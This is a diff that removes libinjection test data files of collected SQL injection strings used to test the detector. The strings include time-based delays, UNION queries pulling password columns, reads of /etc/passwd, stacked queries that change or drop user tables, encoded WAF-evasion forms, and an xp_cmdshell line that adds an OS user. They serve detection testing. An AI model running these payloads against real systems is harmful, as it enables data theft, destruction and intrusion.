'))) or 1=1 or ((('1'='1
"))) or 1=1 or ((("1"="1

44
src/deps/src/ModSecurity/others/libinjection/data/sqli-arneswinnen.net-time.txt
View File

@ -1,44 +0,0 @@
#
# http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/
#
1 or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or 1=1
(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)
(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6) as test
9999' or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or '0'='9999
9999" or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or "0"="9999
9999'+(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)+'9999
9999"+(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)+"9999
9999'||(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)||'9999
9999"||(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)||"9999
(select like('abcdefg',upper(hex(randomblob(150000000))))) as test
(select like('abcdefg',upper(hex(randomblob(150000000)))))
9999'||(select like('abcdefg',upper(hex(randomblob(150000000)))))||'9999
9999"||(select like('abcdefg',upper(hex(randomblob(150000000)))))||"9999
(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5) as test
(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)
9999'||(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)||'9999
9999"||(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)||"9999
(select benchmark(15000000,md5(0x4e446b6e))-9999) as test
benchmark(15000000,md5(0x4e446b6e))-9999
9999' or benchmark(15000000,md5(0x4e446b6e)) or '0'='9999
9999" or benchmark(15000000,md5(0x4e446b6e)) or "0"="9999
(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7) as test
(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)
9999'+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+'9999
9999"+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+"9999
(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3) as test
(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)
9999'||(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)||'9999
9999"||(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)||"9999
(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3) as test
(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)
9999'||(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)||'9999
9999"||(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)||"9999
(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3) as test
(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)
9999'||(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)||'9999
9999"||(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)||"9999
(select 99999999 from pg_sleep(15)) as test
(select 99999999 from pg_sleep(15))
9999'||(select 99999999 from pg_sleep(15))||'9999
9999"||(select 99999999 from pg_sleep(15))||"9999

15
src/deps/src/ModSecurity/others/libinjection/data/sqli-comparitiveprecomputation.txt
View File

@ -1,15 +0,0 @@
# http://www.blackhatlibrary.net/Comparative_precomputation
ascii(substring(version() from 1 for 1))
length((select length(version())))
ascii(substring(length(version()),1,1))
(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=1)
(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=ascii(substring(version() from 1 for 1)))
vulnerable_site' and 1=5 or title=() #'
conv(hex(substr(version() FROM 1 FOR 2)),16,10)
conv(hex(substr(version() FROM 1 FOR 2)),16,10) >> 0x6
conv(hex(substr(version() FROM 2 FOR 2)),16,10) << 0x2 >> 0x6
uncompress(compress(version()))
LENGTH(compress(version()))
LENGTH(version())
LENGTH(load_file('/etc/passwd'))
LENGTH(compress(load_file('/etc/passwd')))

40
src/deps/src/ModSecurity/others/libinjection/data/sqli-edb-17934.txt
View File

@ -1,40 +0,0 @@
# http://www.exploit-db.com/papers/17934/
# A few typos corrected
1+or+1+%3D+1
1+%7C%7C+1+%3D+1
1+and+1+%3D+1
1+%26%26+1+%3D+1
1+%7C%7C+%28select+user+from+users+where+user_id+%3D+1%29+%3D+%27admin%27
1+%7C%7C+%28select+user+from+users+where+user_id+%3D+1%29+%3D+%27admin%27
1+%7C%7C+%28select+user+from+users+limit+1%29+%3D+%27admin%27
1+%7C%7C+%28select+user+from+users+group+by+user_id+having+user_id+%3D+1%29+%3D+%27admin%27
1+%7C%7C+%28select+substr%28group_concat%28user_id%29%2C1%2C1%29+user+from+users+%29+%3D+1
1+%7C%7C+%28select+substr%28group_concat%28user_id%29%2C1%2C1%29+user+from+users%29+%3D+1
1+%7C%7C+1+%3D+1+into+outfile+%27result.txt%27
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+%27a%27
1+%7C%7C+%28select+substr%28group_concat%28user_id%29%2C1%2C1%29+user+from+users%29+%3D+1
1+%7C%7C+user_id+is+not+null
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+0x61
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+unhex%2861%29
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+lower%28conv%2811%2C10%2C36%29%29
1+%7C%7C+lpad%28user%2C7%2C1%29
1%0b||%0blpad(user,7,1)
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+%3D+%27users%27
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+between+%27a%27+and+%27z%27
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+between+char%2897%29+and+char%28122%29
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+between+0x61+and+0x7a
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+like+0x7573657273
1+UnIoN/**/SeLecT/**/1,2,3--
# double url-encoded
## 21%252f%252a*/union%252f%252a*/select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
21%2f%2a*/union%2f%2a*/select%2f%2a*/1,2,3%2f%2a*/from%2f%2a*/users--
1+/**/union/**/select
1+/%2A%2A/union/%2A%2A/select
1+%2f**%2funion%2f**%2fselect
0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
0+div+1+union+select+1%2C2%2Ccurrent_user
1+and+(select 1)=(select+0x414141414141441414141414114141414141414141414141414141414141414141.)+union+select+1,2,version(),database(),user(),6,7,8,9,10--
1/*!UnIoN*/SeLecT+1,2,3--
=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables+*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
1%27%3B+%2F%2A%26id%3D1%2A%2F+EXEC+%2F%2A%26id%3D1%2A%2F+master..xp_cmdshell+%2F%2A%26id%3D1%2A%2F+net+user+lucifer+UrWaFisShiT+%2F%2A%26id%3D1%2A%2F+--

14072
src/deps/src/ModSecurity/others/libinjection/data/sqli-forums.txt
View File

File diff suppressed because it is too large Load Diff

131
src/deps/src/ModSecurity/others/libinjection/data/sqli-fullqueries.txt
View File

@ -1,131 +0,0 @@
#
# Frequently not SQLi but
#
select 1 from foo where
select @version from foo where
select 'foo' from bar where
# select 1,1,1,1,1,1,1
# select @version,@version,@version
# select 'foo','bar',1,2,3,4
select sin(1),2 from bar where
select sin(id),2 from bar where
select sin('1'),2 from bar where
select sin(@version),2 from bar where
select sin((1)),2 from bar where
select sin((id)),2 from bar where
select sin(('1')),2 from bar where
select sin((@version)),2 from bar where
select sin(((1)),2 from bar where
select sin(((id)),2 from bar where
select sin((('1')),2 from bar where
select sin(((@version)),2 from bar where
select -sin(1),2 from bar where
select -sin(id),2 from bar where
select -sin('1'),2 from bar where
select -sin(@version),2 from bar where
select -sin((1)),2 from bar where
select -sin((id)),2 from bar where
select -sin(('1')),2 from bar where
select -sin((@version)),2 from bar where
select -sin(((1)),2 from bar where
select -sin(((id)),2 from bar where
select -sin((('1')),2 from bar where
select -sin(((@version)),2 from bar where
select 1,sin(1),2 from bar where
select 1,sin(id),2 from bar where
select 1,sin('1'),2 from bar where
select 1,sin(@version),2 from bar where
select 1,sin((1)),2 from bar where
select 1,sin((id)),2 from bar where
select 1,sin(('1')),2 from bar where
select 1,sin((@version)),2 from bar where
select 1,sin(((1)),2 from bar where
select 1,sin(((id)),2 from bar where
select 1,sin((('1')),2 from bar where
select 1,sin(((@version)),2 from bar where
select -1,sin(1),2 from bar where
select -1,sin(id),2 from bar where
select -1,sin('1'),2 from bar where
select -1,sin(@version),2 from bar where
select -1,sin((1)),2 from bar where
select -1,sin((id)),2 from bar where
select -1,sin(('1')),2 from bar where
select -1,sin((@version)),2 from bar where
select -1,sin(((1)),2 from bar where
select -1,sin(((id)),2 from bar where
select -1,sin((('1')),2 from bar where
select -1,sin(((@version)),2 from bar where
select id,sin(1),2 from bar where
select id,sin(id),2 from bar where
select id,sin('1'),2 from bar where
select id,sin(@version),2 from bar where
select id,sin((1)),2 from bar where
select id,sin((id)),2 from bar where
select id,sin(('1')),2 from bar where
select id,sin((@version)),2 from bar where
select id,sin(((1)),2 from bar where
select id,sin(((id)),2 from bar where
select id,sin((('1')),2 from bar where
select id,sin(((@version)),2 from bar where
select @version,sin(1),2 from bar where
select @version,sin(id),2 from bar where
select @version,sin('1'),2 from bar where
select @version,sin(@version),2 from bar where
select @version,sin((1)),2 from bar where
select @version,sin((id)),2 from bar where
select @version,sin(('1')),2 from bar where
select @version,sin((@version)),2 from bar where
select @version,sin(((1)),2 from bar where
select @version,sin(((id)),2 from bar where
select @version,sin((('1')),2 from bar where
select @version,sin(((@version)),2 from bar where
select '1',sin(1),2 from bar where
select '1',sin(id),2 from bar where
select '1',sin('1'),2 from bar where
select '1',sin(@version),2 from bar where
select '1',sin((1)),2 from bar where
select '1',sin((id)),2 from bar where
select '1',sin(('1')),2 from bar where
select '1',sin((@version)),2 from bar where
select '1',sin(((1)),2 from bar where
select '1',sin(((id)),2 from bar where
select '1',sin((('1')),2 from bar where
select '1',sin(((@version)),2 from bar where
select -'1',sin(1),2 from bar where
select -'1',sin(id),2 from bar where
select -'1',sin('1'),2 from bar where
select -'1',sin(@version),2 from bar where
select -'1',sin((1)),2 from bar where
select -'1',sin((id)),2 from bar where
select -'1',sin(('1')),2 from bar where
select -'1',sin((@version)),2 from bar where
select -'1',sin(((1)),2 from bar where
select -'1',sin(((id)),2 from bar where
select -'1',sin((('1')),2 from bar where
select -'1',sin(((@version)),2 from bar where
select 1,(2),3 from bar where
select (1),(2),3 from bar where
select ((1)),(2),3 from bar where
select (((1))),(2),3 from bar where
select ('1'),(2),3 from bar where
select (('1')),(2),3 from bar where
select ((('1'))),(2),3 from bar where
select (@version),(2),3 from bar where
select ((@version)),(2),3 from bar where
select (((@version))),(2),3 from bar where
select (id),(2),3 from bar where
select ((id)),(2),3 from bar where
select (((id))),(2),3 from bar where
select (@version),(2),3 from bar where
select (((((1,2,3,4)))) from bar

315
src/deps/src/ModSecurity/others/libinjection/data/sqli-fuzz-ischi.txt
View File

@ -1,315 +0,0 @@
#
#
#
( 'a' ) --
' - ( (SELECT BINARY ( 'b')) ) --
' - ( ( BINARY COS ( 'b')) ) --
' - ( BINARY BINARY ( 'b') ) --
( 1 OR 1 ) --
( 1 OR @a ) --
( ( 1 ) ) --
( 1 * @a ) --
( (SELECT ( 1)) ) --
( (SELECT ( @a)) ) --
( BINARY ( 1) ) --
( BINARY ( @a) ) --
( @a OR 1 ) --
( @a OR @a ) --
( ( @a ) ) --
( ( 1 OR 'b') ) --
( ( 1 * 'b') ) --
( (SELECT ( SELECT 'b')) ) --
( ( SELECT ( 'b')) ) --
( (SELECT 1 OR 'b') ) --
( (SELECT 'a' OR 'b') ) --
( (SELECT BINARY ( 'b')) ) --
( (SELECT BINARY COS ( 'b')) ) --
( (SELECT @a OR 'b') ) --
( COS ( 1 OR 'b') ) --
( COS ( 'a' OR 'b') ) --
( COS ( BINARY ( 'b')) ) --
( COS ( BINARY COS ( 'b')) ) --
( COS ( @a OR 'b') ) --
( 'a' OR 1 ) --
( 'a' OR 'a' ) --
( 'a' OR @a ) --
( 'a' ) --
( 'a' * 1 ) --
( 'a' * 'a' ) --
( 'a' * @a ) --
( BINARY ( SELECT 'b') ) --
( ( BINARY ( 'b')) ) --
( BINARY BINARY ( 'b') ) --
( BINARY BINARY COS ( 'b') ) --
( ( @a OR 'b') ) --
( ( @a * 'b') ) --
( 1 in ( BINARY COS ( 'b')) ) --
( (SELECT ( 1 OR 'b')) ) --
( (SELECT ( SELECT 1)) ) --
( (SELECT ( SELECT @a)) ) --
( (SELECT ( 'a' OR 'b')) ) --
( (SELECT ( BINARY ( 'b'))) ) --
( (SELECT ( BINARY COS ( 'b'))) ) --
( (SELECT ( @a OR 'b')) ) --
( (SELECT 1 OR ( 'b')) ) --
( (SELECT 1 OR 1) ) --
( (SELECT 1 OR COS ( 'b')) ) --
( (SELECT 1 OR @a) ) --
( (SELECT 1 LIMIT 1) ) --
( (SELECT COS ( 1 OR 'b')) ) --
( (SELECT COS ( ( SELECT 'b'))) ) --
( (SELECT COS ( 'a' OR 'b')) ) --
( (SELECT COS ( BINARY ( 'b'))) ) --
( (SELECT COS ( BINARY COS ( 'b'))) ) --
( (SELECT COS ( @a OR 'b')) ) --
( (SELECT 'a' OR ( 'b')) ) --
( (SELECT 'a' OR 1) ) --
( (SELECT 'a' OR COS ( 'b')) ) --
( (SELECT 'a' OR @a) ) --
( (SELECT 'a' LIMIT 1) ) --
( (SELECT BINARY ( 1)) ) --
( (SELECT BINARY ( SELECT 'b')) ) --
( (SELECT BINARY ( COS ( 'b'))) ) --
( (SELECT BINARY ( @a)) ) --
( (SELECT BINARY COS ( 1)) ) --
( (SELECT BINARY COS ( COS ( 'b'))) ) --
( (SELECT BINARY COS ( @a)) ) --
( (SELECT BINARY BINARY ( 'b')) ) --
( (SELECT BINARY BINARY COS ( 'b')) ) --
( (SELECT @a OR ( 'b')) ) --
( (SELECT @a OR 1) ) --
( (SELECT @a OR COS ( 'b')) ) --
( (SELECT @a OR @a) ) --
( (SELECT @a LIMIT 1) ) --
( COS ( 1 OR ( 'b')) ) --
( COS ( 1 OR 1) ) --
( COS ( 1 OR COS ( 'b')) ) --
( COS ( 1 OR @a) ) --
( COS ( COS ( ( SELECT 'b'))) ) --
( COS ( COS ( BINARY ( 'b'))) ) --
( COS ( 'a' OR ( 'b')) ) --
( COS ( 'a' OR 1) ) --
( COS ( 'a' OR COS ( 'b')) ) --
( COS ( 'a' OR @a) ) --
( COS ( BINARY ( 1)) ) --
( COS ( BINARY ( SELECT 'b')) ) --
( COS ( BINARY ( COS ( 'b'))) ) --
( COS ( BINARY ( @a)) ) --
( COS ( BINARY BINARY ( 'b')) ) --
( COS ( BINARY BINARY COS ( 'b')) ) --
( COS ( @a OR ( 'b')) ) --
( COS ( @a OR 1) ) --
( COS ( @a OR COS ( 'b')) ) --
( COS ( @a OR @a) ) --
( BINARY ( 1 OR 'b') ) --
( BINARY ( SELECT ( 'b')) ) --
( BINARY ( SELECT 1) ) --
( BINARY ( SELECT COS ( 'b')) ) --
( BINARY ( SELECT @a) ) --
( BINARY ( 'a' OR 'b') ) --
( BINARY ( BINARY COS ( 'b')) ) --
( BINARY ( @a OR 'b') ) --
( BINARY COS ( 1 OR 'b') ) --
( BINARY COS ( ( SELECT 'b')) ) --
( BINARY COS ( 'a' OR 'b') ) --
( BINARY COS ( BINARY ( 'b')) ) --
( BINARY COS ( BINARY COS ( 'b')) ) --
( BINARY COS ( @a OR 'b') ) --
( BINARY BINARY ( 1) ) --
( BINARY BINARY ( SELECT 'b') ) --
( BINARY BINARY ( COS ( 'b')) ) --
( BINARY BINARY ( @a) ) --
( BINARY BINARY COS ( 1) ) --
( BINARY BINARY COS ( COS ( 'b')) ) --
( BINARY BINARY COS ( @a) ) --
( BINARY BINARY BINARY ( 'b') ) --
( BINARY BINARY BINARY COS ( 'b') ) --
( @a in ( BINARY COS ( 'b')) ) --
( 1 OR ( BINARY ( 'b')) ) --
( 1 OR ( BINARY COS ( 'b')) ) --
( 1 OR COS ( BINARY ( 'b')) ) --
( 1 ) in ( BINARY ( 'b') ) --
( 1 in ( BINARY BINARY ( 'b')) ) --
( 1 * COS ( BINARY ( 'b')) ) --
( (SELECT ( 1 OR ( 'b'))) ) --
( (SELECT ( 1 OR 1)) ) --
( (SELECT ( 1 OR COS ( 'b'))) ) --
( (SELECT ( 1 OR @a)) ) --
( (SELECT ( SELECT 1 OR 'b')) ) --
( (SELECT ( SELECT 'a' OR 'b')) ) --
( (SELECT ( SELECT BINARY ( 'b'))) ) --
( (SELECT ( SELECT BINARY COS ( 'b'))) ) --
( (SELECT ( SELECT @a OR 'b')) ) --
( (SELECT ( COS ( ( SELECT 'b')))) ) --
( (SELECT ( COS ( BINARY ( 'b')))) ) --
( (SELECT ( 'a' OR ( 'b'))) ) --
( (SELECT ( 'a' OR 1)) ) --
( (SELECT ( 'a' OR COS ( 'b'))) ) --
( (SELECT ( 'a' OR @a)) ) --
( (SELECT ( BINARY ( 1))) ) --
( (SELECT ( BINARY ( SELECT 'b'))) ) --
( (SELECT ( BINARY ( COS ( 'b')))) ) --
( (SELECT ( BINARY ( @a))) ) --
( (SELECT ( BINARY BINARY ( 'b'))) ) --
( (SELECT ( BINARY BINARY COS ( 'b'))) ) --
( (SELECT ( @a OR ( 'b'))) ) --
( (SELECT ( @a OR 1)) ) --
( (SELECT ( @a OR COS ( 'b'))) ) --
( (SELECT ( @a OR @a)) ) --
( (SELECT 1 OR ( 1)) ) --
( (SELECT 1 OR ( COS ( 'b'))) ) --
( (SELECT 1 OR ( @a)) ) --
( (SELECT 1 OR 1 * 'b') ) --
( (SELECT 1 OR 'a' * 'b') ) --
( (SELECT 1 OR @a * 'b') ) --
( (SELECT 1 ) OR ( 'b') ) --
( (SELECT 1 ) OR COS ( 'b') ) --
( ( SELECT 1 ) OR 'b' ) --
( (SELECT 1 UNION ( SELECT 'b')) ) --
( (SELECT 1 in ( BINARY ( 'b'))) ) --
( (SELECT COS ( ( SELECT ( 'b')))) ) --
( (SELECT COS ( ( SELECT 1))) ) --
( (SELECT COS ( ( SELECT COS ( 'b')))) ) --
( (SELECT COS ( ( SELECT @a))) ) --
( (SELECT COS ( BINARY BINARY ( 'b'))) ) --
( (SELECT 'a' OR ( 1)) ) --
( (SELECT 'a' OR ( COS ( 'b'))) ) --
( (SELECT 'a' OR ( @a)) ) --
( (SELECT 'a' OR 1 * 'b') ) --
( (SELECT 'a' OR 'a' * 'b') ) --
( (SELECT 'a' OR @a * 'b') ) --
( (SELECT 'a' ) OR ( 'b') ) --
( (SELECT 'a' ) OR COS ( 'b') ) --
( ( SELECT 'a' ) OR 'b' ) --
( (SELECT 'a' UNION ( SELECT 'b')) ) --
( (SELECT 'a' in ( BINARY ( 'b'))) ) --
( (SELECT BINARY ( 1 OR 'b')) ) --
( (SELECT BINARY ( 1 * 'b')) ) --
( (SELECT BINARY ( SELECT ( 'b'))) ) --
( (SELECT BINARY ( SELECT 1)) ) --
( (SELECT BINARY ( SELECT COS ( 'b'))) ) --
( (SELECT BINARY ( SELECT @a)) ) --
( (SELECT BINARY ( 'a' OR 'b')) ) --
( (SELECT BINARY ( 'a' * 'b')) ) --
( (SELECT BINARY ( BINARY ( 'b'))) ) --
( (SELECT BINARY ( BINARY COS ( 'b'))) ) --
( (SELECT BINARY ( @a OR 'b')) ) --
( (SELECT BINARY ( @a * 'b')) ) --
( (SELECT BINARY COS ( ( SELECT 'b'))) ) --
( (SELECT BINARY COS ( BINARY ( 'b'))) ) --
( (SELECT BINARY BINARY ( 1)) ) --
( (SELECT BINARY BINARY ( SELECT 'b')) ) --
( (SELECT BINARY BINARY ( COS ( 'b'))) ) --
( (SELECT BINARY BINARY ( @a)) ) --
( (SELECT BINARY BINARY BINARY ( 'b')) ) --
( (SELECT BINARY BINARY BINARY COS ( 'b')) ) --
( (SELECT @a OR ( 1)) ) --
( (SELECT @a OR ( COS ( 'b'))) ) --
( (SELECT @a OR ( @a)) ) --
( (SELECT @a OR 1 * 'b') ) --
( (SELECT @a OR 'a' * 'b') ) --
( (SELECT @a OR @a * 'b') ) --
( (SELECT @a ) OR ( 'b') ) --
( (SELECT @a ) OR COS ( 'b') ) --
( ( SELECT @a ) OR 'b' ) --
( (SELECT @a UNION ( SELECT 'b')) ) --
( (SELECT @a in ( BINARY ( 'b'))) ) --
( COS ( ( SELECT ( SELECT 'b'))) ) --
( COS ( ( SELECT 1 OR 'b')) ) --
( COS ( ( SELECT 'a' OR 'b')) ) --
( COS ( ( SELECT BINARY ( 'b'))) ) --
( COS ( ( SELECT BINARY COS ( 'b'))) ) --
( COS ( ( SELECT @a OR 'b')) ) --
( COS ( BINARY ( BINARY ( 'b'))) ) --
( COS ( BINARY BINARY BINARY ( 'b')) ) --
( 'a' OR ( BINARY ( 'b')) ) --
( 'a' OR ( BINARY COS ( 'b')) ) --
( 'a' OR COS ( BINARY ( 'b')) ) --
( 'a' ) in ( BINARY ( 'b') ) --
( 'a' * COS ( BINARY ( 'b')) ) --
( BINARY ( 1 OR ( 'b')) ) --
( BINARY ( 1 OR 1) ) --
( BINARY ( 1 OR COS ( 'b')) ) --
( BINARY ( 1 OR @a) ) --
( BINARY ( 1 ) OR 'b' ) --
( BINARY ( SELECT ( 1)) ) --
( BINARY ( SELECT ( SELECT 'b')) ) --
( BINARY ( SELECT ( COS ( 'b'))) ) --
( BINARY ( SELECT ( @a)) ) --
( BINARY ( SELECT 1 OR 'b') ) --
( BINARY ( SELECT 1 * 'b') ) --
( BINARY ( SELECT 'a' OR 'b') ) --
( BINARY ( SELECT 'a' * 'b') ) --
( BINARY ( SELECT BINARY ( 'b')) ) --
( BINARY ( SELECT BINARY COS ( 'b')) ) --
( BINARY ( SELECT @a OR 'b') ) --
( BINARY ( SELECT @a * 'b') ) --
( BINARY ( COS ( ( SELECT 'b'))) ) --
( BINARY ( COS ( BINARY ( 'b'))) ) --
( BINARY ( 'a' OR ( 'b')) ) --
( BINARY ( 'a' OR 1) ) --
( BINARY ( 'a' OR COS ( 'b')) ) --
( BINARY ( 'a' OR @a) ) --
( BINARY ( 'a' ) OR 'b' ) --
( BINARY ( BINARY ( SELECT 'b')) ) --
( BINARY ( BINARY BINARY ( 'b')) ) --
( BINARY ( BINARY BINARY COS ( 'b')) ) --
( BINARY ( @a OR ( 'b')) ) --
( BINARY ( @a OR 1) ) --
( BINARY ( @a OR COS ( 'b')) ) --
( BINARY ( @a OR @a) ) --
( BINARY ( @a ) OR 'b' ) --
( BINARY COS ( ( SELECT ( 'b'))) ) --
( BINARY COS ( ( SELECT 1)) ) --
( BINARY COS ( ( SELECT COS ( 'b'))) ) --
( BINARY COS ( ( SELECT @a)) ) --
( BINARY COS ( BINARY BINARY ( 'b')) ) --
( BINARY BINARY ( 1 OR 'b') ) --
( BINARY BINARY ( 1 * 'b') ) --
( BINARY BINARY ( SELECT ( 'b')) ) --
( BINARY BINARY ( SELECT 1) ) --
( BINARY BINARY ( SELECT COS ( 'b')) ) --
( BINARY BINARY ( SELECT @a) ) --
( BINARY BINARY ( 'a' OR 'b') ) --
( BINARY BINARY ( 'a' * 'b') ) --
( BINARY BINARY ( BINARY ( 'b')) ) --
( BINARY BINARY ( BINARY COS ( 'b')) ) --
( BINARY BINARY ( @a OR 'b') ) --
( BINARY BINARY ( @a * 'b') ) --
( BINARY BINARY COS ( ( SELECT 'b')) ) --
( BINARY BINARY COS ( BINARY ( 'b')) ) --
( BINARY BINARY BINARY ( 1) ) --
( BINARY BINARY BINARY ( SELECT 'b') ) --
( BINARY BINARY BINARY ( COS ( 'b')) ) --
( BINARY BINARY BINARY ( @a) ) --
( BINARY BINARY BINARY BINARY ( 'b') ) --
( BINARY BINARY BINARY BINARY COS ( 'b') ) --
( @a OR ( BINARY ( 'b')) ) --
( @a OR ( BINARY COS ( 'b')) ) --
( @a OR COS ( BINARY ( 'b')) ) --
( @a ) in ( BINARY ( 'b') ) --
( @a in ( BINARY BINARY ( 'b')) ) --
( @a * COS ( BINARY ( 'b')) ) --
( 1 - (SELECT BINARY ( 1)) ) --
( 1 - BINARY ( SELECT 1) ) --
( 1 - BINARY COS ( ( 1)) ) --
( 1 - BINARY BINARY ( 1) ) --
( 1 - BINARY BINARY COS ( 1) ) --
( 1 - BINARY BINARY BINARY ( 'b') ) --
( 'a' or (SELECT BINARY ( 'b')) ) --
( 'a' or BINARY ( SELECT 'b') ) --
( 'a' or BINARY COS ( 1) ) --
( 'a' or BINARY BINARY ( 'b') ) --
( 'a' or BINARY BINARY COS ( 'b') ) --
( 1 IN (1) or (SELECT BINARY ( 'b')) ) --
( 1 IN (1) or BINARY ( SELECT 'b') ) --
( 1 IN (1) or BINARY COS ( 1) ) --
( 1 IN (1) or BINARY BINARY ( 'b') ) --
( 1 IN (1) or BINARY BINARY COS ( 'b') ) --
(select 1 from dual union select 1 limit 1) --
(select 1); (select 1); update users set password = 99
(select 1); select 1; update users set password = 99
select 1; (select 1); update users set password = 99
1; update users set password=1
( (SELECT 'b') ) ; UPDATE user set password = 99;
( (SELECT @a) ) ; UPDATE user set password = 99;

6
src/deps/src/ModSecurity/others/libinjection/data/sqli-github-110.txt
View File

@ -1,6 +0,0 @@
# https://github.com/client9/libinjection/issues/110
# lots of great details in this ticket HT: @lifeforms
id having (1 or 1)
id having (1 or true)
id having (true or 1)

4
src/deps/src/ModSecurity/others/libinjection/data/sqli-github-114.txt
View File

@ -1,4 +0,0 @@
# https://github.com/client9/libinjection/issues/114
# ht @sshayb
; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2

1
src/deps/src/ModSecurity/others/libinjection/data/sqli-github-123.txt
View File

@ -1 +0,0 @@
name=David' AND 2259=DBMS_UTILITY.SQLID_TO_SQLHASH((CHR(113)||CHR(113)||CHR(122)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (2259=2259) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113))) AND 'XrMo' LIKE 'XrMo

11
src/deps/src/ModSecurity/others/libinjection/data/sqli-github-125.txt
View File

@ -1,11 +0,0 @@
# https://github.com/client9/libinjection/issues/125 HT @d0znpp
"-sqlite_version() UNION SELECT password FROM users- --
1337) INTO OUTFILE xxx--
123);DROP TABLE users--
) OR (SELECT password FROM users ...
# the following don't fit into the libinjection model and are
# best handled in another layer, at least for now.
#)-sleep(9999
#*/UNION SELECT password FROM users--

3
src/deps/src/ModSecurity/others/libinjection/data/sqli-github-modsec-782.txt
View File

@ -1,3 +0,0 @@
# https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/782
.1or-UTC_DATE--

265
src/deps/src/ModSecurity/others/libinjection/data/sqli-hackers.txt
View File

@ -1,265 +0,0 @@
1%20AND%20%28select%20DCount%28last%28username%29
1%29%20from%20users%20where%20username%3D%27ad1min%27%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20substr%28id%2C%40a%2C%40v%29%20from%20users%20limit%201%2C1%29
